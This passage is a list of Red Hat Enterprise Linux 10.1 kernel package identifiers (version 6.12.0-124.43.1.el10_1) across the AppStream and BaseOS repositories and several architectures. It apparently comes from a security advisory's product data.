"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
